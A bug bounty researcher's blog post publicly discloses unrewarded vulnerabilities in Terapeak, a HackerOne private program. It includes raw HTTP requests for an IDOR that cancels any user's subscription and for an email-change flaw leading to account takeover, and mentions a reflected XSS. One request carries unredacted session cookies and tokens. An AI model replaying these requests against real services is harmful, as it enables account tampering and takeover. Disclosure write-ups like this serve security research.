All About Hackerone Private Program Terapeak

Hi folks!!

Here is a new blog post – all about Hackerone private program Terapeak.

One day I got private invitation from Hackerone and started digging in that, as I was trying to come back in bug bounty. I thought this was the right time to get some reputation. After spending sometime I found some XSS, CSRF, IDOR’s, SQLI etc.

I reported all the issues on Hackerone and started waiting for the response. I was not having good reputation at that time and that was the only hope for me to get new invitations and start afresh on bug bounty.

Sadlly, it wasn’t a good start as my first IDOR was a duplicate where one can execute java-script into anyone’s account and the reward for that bug was $5000.

Finally 🙂 all bugs got triage and I was like 😀

It was over five months and yet I was not getting any updates. Then I got some bounty from Terapeak for XSS and for other smaller bugs, but still critical bugs like IDOR’s, CSRF, SQLI were triage and I was getting no reply.

After contacting Hackerone I got to know that they will get back soon but nothing in my favour. Then I met Adam Bacchus in Nullcon India and shared everything with him. He assured me his best and I was told that he would be updating me but still there was no reply from Terapeak. There was no reply in spite of my repeated communication with Terapeak and Terapeak security members. Then a ray of hope arose when I got an update from Adam Bacchus that terapeak is waiting for their sales manager who will decide the budget for bounty and I was to wait for at least two weeks. Months passed but nothing happened !

And then I started chatting with Jason Kabaker and he updated me that Terapeak is coming back and will start rewarding patient hackers only. Till date there is no update on my hackerone profile. I lost all my hope and thought to write a blog post about the situation. And I asked Hackerone team for the approval and as per the Hackerone disclosure guidelines, hackers can publicly disclose if the response time is over months.

I acknowledge all of the hard work you guys did at HackerOne to try and rectify the situation.

So here are some of the bugs which I’ve found:

Critical IDOR – Cancel any user subscription, Edit subscription, Add subscription

So with this IDOR I was able to change subscription and delete subscription of any user.


PUT /svc/cancel_subscription HTTP/1.1
Host: www.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Referer: https://sell.terapeak.com/?page=subscriptions
Content-Length: 160
Origin: https://sell.terapeak.com
Connection: close

{"email":"shubham**************@gmail.com","productName":"Terapeak+MySales Pro eBay","zuoraSubscriptionId":"2039653","mmiSubscriptionId":2039653,"mmiId":1257777}

so we just need to change <email> with a victim mail and we can remove Terapeak MySales Pro subscription from his/her id.2039653 is a subcription id so we don’t need to change it.

Reflected XSS

I found XSS in serach box of terapeak.

go to http://www.terapeak.com/worth/search


IDOR in Change Email

I was testing for change email option and I found that for change email you need to submit a request on https://support.terapeak.com/hc/en-us/requests/new?ticket_form_id=64245&contact=form

Fill the form subject should be to change email.Attacker can send the following request and change User email as there is no verification.

POST /hc/en-us/requests HTTP/1.1
Host: support.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://support.terapeak.com/hc/en-us/requests/new?ticket_form_id=64245&contact=form
Cookie: optimizelyEndUserId=oeu1476503787855r0.20443462719204775; optimizelySegments=%7B%22229813889%22%3A%22ff%22%2C%22229833781%22%3A%22referral%22%2C%22229852304%22%3A%22false%22%7D; optimizelyBuckets=%7B%223386134531%22%3A%223408741298%22%2C%227527391520%22%3A%227536641212%22%2C%226456040624%22%3A%226450293330%22%2C%225673570093%22%3A%225673580215%22%2C%227096310114%22%3A%227085320185%22%7D; __utma=195498537.885603089.1476503793.1479553234.1479567441.23; __utmz=195498537.1476503793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tp_ee_last_visit=1478889321; tp_ee_last_activity=1479058746; TERAPEAK_SESSID=t23qp3c6sqbmlgfjgrp1s3ho71; __tpa=1581941b032c10; tp_x8=69.0803835087417002-082f039pt%2FtjRC5DXUPHA4wudayrnWMIEpG8vsZYSBxk6gNKqoTF0mb7lfQJ1eO92ihV3zcL%3D; token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1; tokenExpiry=1510144207136; _ga=GA1.2.885603089.1476503793; localeHeader=en-US,en; i18next=en-US; userRole=PHOENIX_PROFESSIONAL; currency=USD; tpebayCurrencyId=1; __utmb=195498537.8.10.1479567441; __utmc=195498537; _zendesk_shared_session=-ZGhRQXNjcytPOGJmRnErQU5jaXlHeXNUckJDWnFwT1dTQ28rVjNGbEg2Mk5qWGRqNzZHWlZJS0RwQlRPWjVxSXZiNmhxREI3c2NIelhJRDNxS0UxRzVxcHMycnN5cmxiVlZOKzc0VkU1R0NtLzBuUGZJdjU3dFA4V2VhelI4cEIzTGYxUGhZY09wQVkrb0pvWWtJRWZFT1UzdkttWGRNaEpMN0xwQkZhUXNZPS0tQ1VRT1lhVnJKd2owRGYxVHI2aFR3dz09--c5e0e90c59f80a5e15a8dc4f6d84a95e2f70d0de; _help_center_session=WnhtUXNBSHNBczJHa0cvcmVMMzJ2TUdiTUk2clExRDQ2MU9LbGl1YTFFZUUrclBjWHVLZFl2Q2VNK3lhaUtZSjRsNWRDeEtVT2xYeFRqeVYrZG1ESmdnZHhsbWNlZ09HOGVsWnFGdEltTzkvOTNIeURGMjR0cGhWWU1mN1JJL1UxZmFIWFppQzlwNzBVRHE1ZURXN0swUFhMOTZPcURkN3ZjbjlFMHNjYkZHdldGS1RLOXBQSzRjM3AxR1pBYkphNVh6SkRYK2F6N1EraGJTQm9hUkd2allzd2h1eC84TDhweURRbmFUOG9nenNBQlZPNWNwWkdvdkFYb2VKV2Y5WS0taUFEbzlVelA2YTJhWWtVaEJXSklOZz09--68ea8978d02eaf0460db4868e0fd5cc292dd4daf
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 492

anonymous_requester_email%5D=shubham***********@gmail.com is vulnerable for IDOR attack, attacker need to change email to user email.

To verify that i did the same test on my account and Armaan Pathan Account.


An attacker can basically plot a IDOR attack which would change the default email of the user and this would led to account takeover.

Thanks for reading I want you guys to share this as much as possible.